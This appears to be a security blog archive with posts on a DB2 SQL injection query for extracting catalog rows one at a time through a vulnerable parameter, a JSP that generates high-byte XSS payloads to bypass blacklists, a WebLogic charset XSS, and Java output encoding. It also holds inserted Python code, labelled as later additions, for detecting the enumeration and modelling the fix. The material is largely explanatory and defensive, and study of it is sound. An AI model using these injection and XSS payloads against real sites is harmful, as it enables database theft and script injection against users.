2011-09-13

DB2 SQL Injection : Select the Nth row without cursors

Well, I've looked all over the net for this solution and I could not find the answer, so after much trial and error I was able to build my own solution. Let's say you need to query one row at a time from DB2 and you cannot use cursors, and specifically you need to query sysibm.systables. I came up with this solution; there may be a more elegant way, but this worked.

select * from (
        select * from systables order by name asc fetch first 1 rows only
) as G order by name desc fetch first 1 rows only

select * from (
        select * from systables order by name asc fetch first 2 rows only
) as G order by name desc fetch first 1 rows only

select * from (
        select * from systables order by name asc fetch first 3 rows only
) as G order by name desc fetch first 1 rows only

...

...

select * from (
        select * from systables order by name asc fetch first 1000 rows only
) as G order by name desc fetch first 1 rows only

I put the below query into a vulnerable parameter sent to a website and used Burp Intruder to iterate through each row by incrementing N.

select * from (
        select * from systables order by name asc fetch first N rows only
) as G order by name desc fetch first 1 rows only

The query works by first requesting N rows with the data ordered ascending, which puts the Nth row at the bottom of the result set. Next, query that result set ordered descending so that the Nth row is now at the top, and fetch the first row. The result set will then return the Nth row you need without having to define cursors.
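Detection logic for the row-by-row pattern just described, added here as an example and not part of the original post. It parses constructed access-log lines (the IPs, path and timestamps are made up), pulls out request parameters carrying a DB2 catalog query in the nested FETCH FIRST N / FETCH FIRST 1 shape, and reports a client whose N steps upward request after request, which is what an intruder tool iterating N looks like from the server side.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, quote, urlsplit

# Shape of the probe described in the post, with N filled in per request.
QUERY_TEMPLATE = ("select * from (select * from sysibm.systables order by name asc "
                  "fetch first {n} rows only) as G order by name desc fetch first 1 rows only")

def _log_line(ip, second, param_value):
    # Constructed combined-log style line; application path and IPs are made up.
    return (f'{ip} - - [13/Sep/2011:10:01:{second:02d} -0400] '
            f'"GET /app/item?id={quote(param_value, safe="")} HTTP/1.1" 200 640')

# Constructed sample log: one benign request, then one client stepping N = 1, 2, 3.
SAMPLE_LOG = "\n".join(
    [_log_line("10.0.0.7", 1, "42")]
    + [_log_line("10.0.0.9", 1 + n, QUERY_TEMPLATE.format(n=n)) for n in (1, 2, 3)]
)

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
FETCH_FIRST = re.compile(r"fetch\s+first\s+(\d+)\s+rows?\s+only", re.I)
CATALOG = re.compile(r"\b(?:sysibm\.systables|syscat\.tables|systables)\b", re.I)

def row_probes(log_text):
    """Yield (client, N) for each request whose decoded parameter carries a
    DB2 catalog query in the nested FETCH FIRST N ... FETCH FIRST 1 shape."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, url = m.group(1), m.group(2)
        for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
            counts = [int(x) for x in FETCH_FIRST.findall(value)]
            if CATALOG.search(value) and len(counts) >= 2 and counts[-1] == 1:
                yield client, counts[0]

def find_enumeration(log_text, min_steps=3):
    """Group probes by client and report those whose N rises on every request:
    the signature of walking the catalog one row at a time."""
    seen = defaultdict(list)
    for client, n in row_probes(log_text):
        seen[client].append(n)
    return {c: ns for c, ns in seen.items()
            if len(ns) >= min_steps and all(b > a for a, b in zip(ns, ns[1:]))}

if __name__ == "__main__":
    for client, steps in find_enumeration(SAMPLE_LOG).items():
        print(f"row-by-row catalog enumeration from {client}: N = {steps}")
```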


2011-04-28

Hacking 101 with Tracer-T

This makes me laugh every time I watch it. I still cannot figure out if the kid is joking or serious.

2011-03-27

Roku hidden features.

I finally bought a Roku device today and immediately went looking for development resources. I was surprised to find they have an SDK you can download for free, and you don’t need to pay anything to distribute your app as long as you’re distributing it for free. You can easily put your device into ‘Development Mode’, which lets you upload code directly to the device through an HTTP interface and also enables a telnet port through which you can step through/debug the code. I think it’s great that you have the option to run the code locally on your own device, create a private channel so that only a select few can see it, or make it public (i.e. everyone in the world). I’m still new to this, but I can’t help but wonder what their app review process is like to ensure malware-like apps are not being distributed; I’ll get more into that at a later date.

All of this is cool and I can’t wait to make my own channel, but the other really cool trick it can do is act as a network sniffer! It has the option to enable tcpdump, which will cycle through up to 4 dump files. These are all available via its web interface. This could be fun just to leave running for a few days to see what turns up.

Be forewarned, there doesn’t seem to be any security around this stuff once it’s enabled though. No password is required to access any of these features once they are enabled, but you must use the remote to enable them. It’s like putting in the cheat codes to old Nintendo games. UP,UP,DN,DN, Left,Right,Left,Right, B,A….

The channel code is written in BrightScript, which is completely new to me. It looks a lot, well exactly, like VBScript. I have never been a big fan of languages that don’t end lines in semicolons. Probably because I started learning programming in C. I was actually kinda expecting something more Java-like. That was more wishful thinking on my part I guess.

Since it’s got tcpdump built in, let’s see if I can port RADAR over to it. :P

2011-03-25

Hack Like in the Movies… with RADAR

I have just started a new (possibly open source) project/experiment to perform 3D modeling of network traffic and networking events in near real time. My idea was to give users the freedom of movement of a First Person Shooter (WASD controls) and the ability to better visualize how attacks interact with the network. Some things are just more apparent when you have a different view.

Introducing RADAR

RADAR is written in Java using OpenGL so that it should be easy to port to any system. It has a built-in network sniffer and currently only Nmap integration. It listens to network traffic and animates information about all devices it finds on the network, including open ports, whois, HTTP request/responses, etc. When complete it will have the ability to record, playback, pause, rewind, and slow down these events in the animation.
RADAR represents all IP devices as 3D orbs and places them in rings that somewhat represent subnets, but basically anything that matches the first two octets goes into a ring group at this point (may be better later on). All orbs can be clicked to display detailed information about what’s communicating with the host. It displays a parsed-out view of the pcap data by row, and when a row is selected a view of the actual hexdump is visible. This can be better explained by the video below.


Download Coming Soon…

Soon as I feel comfortable with it I will release a version that any of you out there can try out.

2008-12-17

WebLogic and Non-English Character Sets

I want to discuss in more depth the vulnerability Matt Presson and I have been working on. Apparently if you have a WebLogic server and you accept international characters but you have the page encoding set to ISO 8859-1, then you are vulnerable to a whole mess of XSS attacks, and any script listed in my previous blog post will execute. What seems to happen (we are still trying to find the exact cause) is that the web server truncates the upper byte when returning the request, so if you entered 0x013C the response will contain 0x3C, which is of course '<' and freakin vulnerable ;) This gets past the default output encoding done by <bean:write>, which uses the function ResponseUtils.filter() to do all of its output encoding. If you use StringEscapeUtils.escapeHtml() from Apache Commons Lang then all your output will be encoded correctly, as demonstrated by the war file Matt Presson released.

I also modified Matt's code so that the regular POST is also vulnerable. The AJAX post was vulnerable because it called encodeURIComponent from JavaScript. If you set the form to accept-charset="UTF-8" then the data will be encoded the same way as with encodeURIComponent.

   <form name="dataForm" id="form" method="POST" action="/International/execute/Display" accept-charset="UTF-8">


Below is a video of the attack being exploited both in AJAX and in a regular POST.



I have currently tested this on Tomcat and GlassFish and was unable to get the same results, so it seems to be primarily a WebLogic issue.


I would like to thank Gareth Heyes for giving me a hacker tag in Hackvertor to perform this exploit!!!!

2008-10-23

Why not to use Blacklists.

I was looking at Matt Presson's blog article about executing scripts with foreign character sets and decided to write my own JSP to generate every XSS that could be executed with foreign characters. This is a perfect example of why not to use blacklists. A simple whitelist, or better, proper output encoding (mentioned in my last post), will thwart these attempts.

<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<%@page import="org.apache.commons.lang.StringEscapeUtils" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
<%
for(long i=0; i< 0x100; i++)
{
    long lt = 0x3C;
    long gt = 0x3E;
    long order = i << 8;
    long LT = order | lt;
    //out.println(Long.toHexString(LT) + " : ");
    long GT = order | gt;
    //out.println(Long.toHexString(GT) + "<BR>");
    String theScript = (char)LT + "script" + (char)GT + "alert(" + i + ");" +(char)LT + "/script" + (char)GT;
    out.println( theScript + "<br>");
}

%>
</body>
</html>


This will generate 256 different versions of JavaScript to bypass blacklist input validation attempts. Here are a few examples. They may not display properly on this blog, so I recommend running it on your own Tomcat server.

ļscriptľalert(1);ļ/scriptľ
ȼscriptȾalert(2);ȼ/scriptȾ
̼script̾alert(3);̼/script̾
мscriptоalert(4);м/scriptо
ԼscriptԾalert(5);Լ/scriptԾ
ؼscriptؾalert(6);ؼ/scriptؾ
ܼscriptܾalert(7);ܼ/scriptܾ
࠼script࠾alert(8);࠼/script࠾
़scriptाalert(9);़/scriptा
਼scriptਾalert(10);਼/scriptਾ
଼scriptାalert(11);଼/scriptା
఼scriptాalert(12);఼/scriptా
഼scriptാalert(13);഼/scriptാ
฼script฾alert(14);฼/script฾
༼script༾alert(15);༼/script༾
ြscriptှalert(16);ြ/scriptှ
ᄼscriptᄾalert(17);ᄼ/scriptᄾ
ሼscriptሾalert(18);ሼ/scriptሾ
ጼscriptጾalert(19);ጼ/scriptጾ
ᐼscriptᐾalert(20);ᐼ/scriptᐾ
ᔼscriptᔾalert(21);ᔼ/scriptᔾ
ᘼscriptᘾalert(22);ᘼ/scriptᘾ
᜼script᜾alert(23);᜼/script᜾
ᠼscriptᠾalert(24);ᠼ/scriptᠾ
᤼script᤾alert(25);᤼/script᤾
ᨼscriptᨾalert(26);ᨼ/scriptᨾ
ᬼscriptᬾalert(27);ᬼ/scriptᬾ
᰼script᰾alert(28);᰼/script᰾
ᴼscriptᴾalert(29);ᴼ/scriptᴾ
ḼscriptḾalert(30);Ḽ/scriptḾ
ἼscriptἾalert(31);Ἴ/scriptἾ
‼script‾alert(32);‼/script‾
ℼscriptℾalert(33);ℼ/scriptℾ
∼script∾alert(34);∼/script∾
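A model of the two posts above (the upper-byte truncation described under WebLogic and the 256 variants the JSP generates), added here as an example and not code from either post or from WebLogic: it rebuilds a variant, shows that a blacklist passes it while the modelled truncating encoder turns it back into a script tag, and shows that entity-encoding the output down to pure ASCII (the behaviour the posts credit StringEscapeUtils.escapeHtml with) leaves the truncation nothing to restore. The truncating encoder, the two filters and the ASCII escaper are assumptions that model the described behaviour.

```python
import html
import re
from typing import Optional

LT, GT = 0x3C, 0x3E

def high_byte_variant(high: int, n: int = 1) -> str:
    """Rebuild the payload the JSP above emits for loop index `high`: '<' and '>'
    with `high` ORed into the upper byte, so U+013C / U+013E for high == 1."""
    lt, gt = chr((high << 8) | LT), chr((high << 8) | GT)
    return f"{lt}script{gt}alert({n});{lt}/script{gt}"

def latin1_truncate(text: str) -> str:
    """Model (assumption) of the faulty response encoding the WebLogic post
    describes: each code unit is written as its low byte only. A conforming
    encoder would emit '?' for unmappable characters instead."""
    return "".join(chr(ord(c) & 0xFF) for c in text)

def blacklist_filter(text: str) -> str:
    """The input blacklist the post argues against: reject only a literal tag."""
    return "" if re.search(r"<\s*/?\s*script", text, re.I) else text

def allowlist_filter(text: str) -> Optional[str]:
    """Whitelist alternative: accept only characters explicitly permitted."""
    return text if re.fullmatch(r"[A-Za-z0-9 _.,@-]*", text) else None

def escape_html_ascii(text: str) -> str:
    """Proper output encoding in the style the posts credit escapeHtml with:
    metacharacters become entities and every character above 0x7F becomes a
    numeric reference, so the result is pure ASCII and a downstream charset
    truncation has nothing left to turn into '<'."""
    return "".join(c if ord(c) < 0x80 else f"&#{ord(c)};"
                   for c in html.escape(text, quote=True))

def browser_sees(text: str, output_filter) -> str:
    """What reaches the browser: the filter's output, then the truncating encoder."""
    return latin1_truncate(output_filter(text))

def is_script_tag(rendered: str) -> bool:
    return re.search(r"<script>", rendered, re.I) is not None

if __name__ == "__main__":
    v = high_byte_variant(1)
    print("blacklist ->", browser_sees(v, blacklist_filter))
    print("escaped   ->", browser_sees(v, escape_html_ascii))
```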

2008-10-20

What do you mean no Java output encoding !!!

I hear all the time that Java does not have any good encoding libraries, but I have used some frameworks that do seem to encode the output properly. If you use the Struts framework and implement it properly, then all your output is encoded properly as long as you use the following methods to output data.


<bean:write name="secData" property="username"/><br>
<html:link href="./test.jsp" paramId="test" paramName="secData" paramProperty="username" > <bean:write name="secData" property="username"/></html:link><br>
<html:hidden name="secData" property="username" /> <br>

The tags bean:write, html:hidden, and html:link will all encode their output: URL encoding for html:link (which creates an anchor tag) and html:hidden, and entity encoding for bean:write.


What if you're not using Struts, you ask?

Well, this is great if you are using Struts 1 or Struts 2 (the output tags are different for Struts 2), but what if you are not, or you are writing servlets that generate HTML dynamically? This is not a problem. I dug a little deeper into Struts to see what it was doing and whether there is a way to leverage this for other sites that do not use the framework. The URL encoding is simply URLEncoder.encode(your string, your format). It uses a default Java class that has been around since 1.5. Just import java.net.URLEncoder.


Example:

String output = URLEncoder.encode("your String" , "UTF-8");


Struts 1 uses an entity encoder built specifically into the Struts framework. The entity encoding is done by a Struts class called ResponseUtils. So you could import this class and still not use the Struts MVC architecture.

Example:

String output = org.apache.struts.util.ResponseUtils.filter("your string");


Struts 2 does entity encoding using the class TextUtils from WebWork. Import org.opensymphony.xwork2.util.TextUtils.

Example:

String output = org.opensymphony.xwork2.util.TextUtils.htmlEncode("your string", true);


Proper Encoding with international Chars!!!!

There are other encoding options provided by the Apache Commons Lang library. This library is probably the most useful. To get it to properly encode international chars to the screen you need to first unescape the HTML before you escape it. import org.apache.commons.lang.StringEscapeUtils;


Example:

String Output = StringEscapeUtils.escapeHtml(StringEscapeUtils.unescapeHtml(input));


Below is an example screenshot of all the above encodings in a simple servlet. Notice that StringEscapeUtils (the last one) will properly encode the XSS attempt plus the Chinese character set. This will solve the problem all you Java developers have with output encoding international characters, and you can quit complaining that there aren't any good encoding options for Java. =) My source code is attached here: http://my-security-projects.googlecode.com/files/testEncoding.war


I hope this finally answers everyone's concerns about international character encoding in Java. I'll let all of you out there in the hacker community see if you can find a way to get past this model. Let me know if you do.


Here is the page source:




<html><body>
<h1> Servlet Test </h1>
<br><b>Input String: </b> <script>alert('xss');</script> &#29615;&#29699;&#32463;&#27982;&#19981;&#26223;
&#27668;&#20013;&#22269;&#32463;&#27982;&#22686;&#38271;&#25918;&#32531; &#20013;&#22269;&#32463;&#27982;
&#22312;&#29615;&#29699;&#19981;&#26223;&#27668;&#19979;&#21576;&#29616;&#25918;&#32531;&#24577;&#21183;
&#65292;&#26368;&#26032;&#22269;&#20869;&#29983;&#20135;&#24635;&#20540;&#22686;&#38271;&#20026;9.9%&#65292;
&#36890;&#32960;&#25345;&#32493;&#25918;&#32531;&#12290; &#20013;&#22269;&#20061;&#26376;&#36152;&#26131;
&#30408;&#20313;&#21019;&#32426;&#24405; &#35775;&#35848;&#65306;&#20013;&#22269;&#22806;&#36152;&#21069;
&#26223;&#19981;&#23481;&#20048;&#35266; &#37329;&#34701;&#39118;&#26292;&#65306;&#20013;&#22269;&#38754;
&#20020;&#30340;&#21361;&#26426;&#19982;&#26426;&#36935;
<br>
<b>java.net.URLEncoded: </b>%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E+++
%26%2329615%3B%26%2329699%3B%26%2332463%3B%26%2327982%3B%26%2319981%3B%26%2326223%3B
%26%2327668%3B%26%2320013%3B%26%2322269%3B%26%2332463%3B%26%2327982%3B%26%2322686%3B
%26%2338271%3B%26%2325918%3B%26%2332531%3B+%26%2320013%3B%26%2322269%3B%26%2332463
%3B%26%2327982%3B%26%2322312%3B%26%2329615%3B%26%2329699%3B%26%2319981%3B%26%2326223
%3B%26%2327668%3B%26%2319979%3B%26%2321576%3B%26%2329616%3B%26%2325918%3B%26%2332531
%3B%26%2324577%3B%26%2321183%3B%26%2365292%3B%26%2326368%3B%26%2326032%3B%26%2322269
%3B%26%2320869%3B%26%2329983%3B%26%2320135%3B%26%2324635%3B%26%2320540%3B%26%2322686
%3B%26%2338271%3B%26%2320026%3B9.9%25%26%2365292%3B%26%2336890%3B%26%2332960%3B%26
%2325345%3B%26%2332493%3B%26%2325918%3B%26%2332531%3B%26%2312290%3B+%26%2320013%3B
%26%2322269%3B%26%2320061%3B%26%2326376%3B%26%2336152%3B%26%2326131%3B%26%2330408
%3B%26%2320313%3B%26%2321019%3B%26%2332426%3B%26%2324405%3B+%26%2335775%3B%26
%2335848%3B%26%2365306%3B%26%2320013%3B%26%2322269%3B%26%2322806%3B%26%2336152%3B%26
%2321069%3B%26%2326223%3B%26%2319981%3B%26%2323481%3B%26%2320048%3B%26%2335266%3B+
%26%2337329%3B%26%2334701%3B%26%2339118%3B%26%2326292%3B%26%2365306%3B%26%2320013%3B
%26%2322269%3B%26%2338754%3B%26%2320020%3B%26%2330340%3B%26%2321361%3B%26%2326426%3B
%26%2319982%3B%26%2326426%3B%26%2336935%3B+
<br>
<b>(apache commons lang) org.apache.commons.lang.StringEscapeUtils: </b>&lt;script&gt;alert('xss');&lt;/script&gt;
&amp;#29615;&amp;#29699;&amp;#32463;&amp;#27982;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#20013;&amp;#22269;&amp;#32463;
&amp;#27982;&amp;#22686;&amp;#38271;&amp;#25918;&amp;#32531; &amp;#20013;&amp;#22269;&amp;#32463;&amp;#27982;&amp;#22312;
&amp;#29615;&amp;#29699;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#19979;&amp;#21576;&amp;#29616;&amp;#25918;&amp;#32531;
&amp;#24577;&amp;#21183;&amp;#65292;&amp;#26368;&amp;#26032;&amp;#22269;&amp;#20869;&amp;#29983;&amp;#20135;&amp;#24635;
&amp;#20540;&amp;#22686;&amp;#38271;&amp;#20026;9.9%&amp;#65292;&amp;#36890;&amp;#32960;&amp;#25345;&amp;#32493;&amp;#25918;
&amp;#32531;&amp;#12290; &amp;#20013;&amp;#22269;&amp;#20061;&amp;#26376;&amp;#36152;&amp;#26131;&amp;#30408;&amp;#20313;
&amp;#21019;&amp;#32426;&amp;#24405; &amp;#35775;&amp;#35848;&amp;#65306;&amp;#20013;&amp;#22269;&amp;#22806;&amp;#36152;
&amp;#21069;&amp;#26223;&amp;#19981;&amp;#23481;&amp;#20048;&amp;#35266; &amp;#37329;&amp;#34701;&amp;#39118;&amp;#26292;
&amp;#65306;&amp;#20013;&amp;#22269;&amp;#38754;&amp;#20020;&amp;#30340;&amp;#21361;&amp;#26426;&amp;#19982;&amp;#26426;
&amp;#36935;
<br>
<b>(struts-core-1.3.8.jar) org.apache.struts.util.ResponseUtils: </b>&lt;script&gt;alert(&#39;xss&#39;);&lt;/script&gt;
&amp;#29615;&amp;#29699;&amp;#32463;&amp;#27982;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#20013;&amp;#22269;&amp;#32463;
&amp;#27982;&amp;#22686;&amp;#38271;&amp;#25918;&amp;#32531; &amp;#20013;&amp;#22269;&amp;#32463;&amp;#27982;&amp;#22312;
&amp;#29615;&amp;#29699;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#19979;&amp;#21576;&amp;#29616;&amp;#25918;&amp;#32531;
&amp;#24577;&amp;#21183;&amp;#65292;&amp;#26368;&amp;#26032;&amp;#22269;&amp;#20869;&amp;#29983;&amp;#20135;&amp;#24635;
&amp;#20540;&amp;#22686;&amp;#38271;&amp;#20026;9.9%&amp;#65292;&amp;#36890;&amp;#32960;&amp;#25345;&amp;#32493;&amp;#25918;
&amp;#32531;&amp;#12290; &amp;#20013;&amp;#22269;&amp;#20061;&amp;#26376;&amp;#36152;&amp;#26131;&amp;#30408;&amp;#20313;
&amp;#21019;&amp;#32426;&amp;#24405; &amp;#35775;&amp;#35848;&amp;#65306;&amp;#20013;&amp;#22269;&amp;#22806;&amp;#36152;
&amp;#21069;&amp;#26223;&amp;#19981;&amp;#23481;&amp;#20048;&amp;#35266; &amp;#37329;&amp;#34701;&amp;#39118;&amp;#26292;
&amp;#65306;&amp;#20013;&amp;#22269;&amp;#38754;&amp;#20020;&amp;#30340;&amp;#21361;&amp;#26426;&amp;#19982;&amp;#26426;
&amp;#36935;
<br>
<b>(xwork) com.opensymphony.xwork2.util.TextUtils with spec chars: </b>&lt;script&gt;alert('xss');&lt;/script&gt;
&amp;#29615;&amp;#29699;&amp;#32463;&amp;#27982;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#20013;&amp;#22269;&amp;
#32463;&amp;#27982;&amp;#22686;&amp;#38271;&amp;#25918;&amp;#32531; &amp;#20013;&amp;#22269;&amp;#32463;&amp;#27982;
&amp;#22312;&amp;#29615;&amp;#29699;&amp;#19981;&amp;#26223;&amp;#27668;&amp;#19979;&amp;#21576;&amp;#29616;&amp;#25918;
&amp;#32531;&amp;#24577;&amp;#21183;&amp;#65292;&amp;#26368;&amp;#26032;&amp;#22269;&amp;#20869;&amp;#29983;&amp;#20135;
&amp;#24635;&amp;#20540;&amp;#22686;&amp;#38271;&amp;#20026;9.9%&amp;#65292;&amp;#36890;&amp;#32960;&amp;#25345;&amp;
#32493;&amp;#25918;&amp;#32531;&amp;#12290; &amp;#20013;&amp;#22269;&amp;#20061;&amp;#26376;&amp;#36152;&amp;#26131;
&amp;#30408;&amp;#20313;&amp;#21019;&amp;#32426;&amp;#24405; &amp;#35775;&amp;#35848;&amp;#65306;&amp;#20013;&amp;
#22269;&amp;#22806;&amp;#36152;&amp;#21069;&amp;#26223;&amp;#19981;&amp;#23481;&amp;#20048;&amp;#35266; &amp;#37329;
&amp;#34701;&amp;#39118;&amp;#26292;&amp;#65306;&amp;#20013;&amp;#22269;&amp;#38754;&amp;#20020;&amp;#30340;&amp;#21361;
&amp;#26426;&amp;#19982;&amp;#26426;&amp;#36935;
<br>
<b>apache commons unescape then escape with StringEscapeUtils: </b>&lt;script&gt;alert('xss');&lt;/script&gt;
&#29615;&#29699;&#32463;&#27982;&#19981;&#26223;&#27668;&#20013;&#22269;&#32463;&#27982;&#22686;&#38271;&#25918;
&#32531; &#20013;&#22269;&#32463;&#27982;&#22312;&#29615;&#29699;&#19981;&#26223;&#27668;&#19979;&#21576;&#29616;
&#25918;&#32531;&#24577;&#21183;&#65292;&#26368;&#26032;&#22269;&#20869;&#29983;&#20135;&#24635;&#20540;&#22686;
&#38271;&#20026;9.9%&#65292;&#36890;&#32960;&#25345;&#32493;&#25918;&#32531;&#12290; &#20013;&#22269;&#20061;
&#26376;&#36152;&#26131;&#30408;&#20313;&#21019;&#32426;&#24405; &#35775;&#35848;&#65306;&#20013;&#22269;&#22806;
&#36152;&#21069;&#26223;&#19981;&#23481;&#20048;&#35266; &#37329;&#34701;&#39118;&#26292;&#65306;&#20013;&#22269;
&#38754;&#20020;&#30340;&#21361;&#26426;&#19982;&#26426;&#36935;
<br>
<form action="AscetikServlet" method="POST" >
<input type="text" id="input" name="input" >
<input type="submit" >
</form>
</body>
</html>


References:
Apache Commons Lang: http://commons.apache.org/lang/
Struts 1: http://struts.apache.org/
Struts 2: http://struts.apache.org/2.x/
WebWork: http://www.opensymphony.com/webwork/
My code: http://my-security-projects.googlecode.com/files/testEncoding.war
My code is written for Tomcat 6 with Java 1.6 and all the above libraries.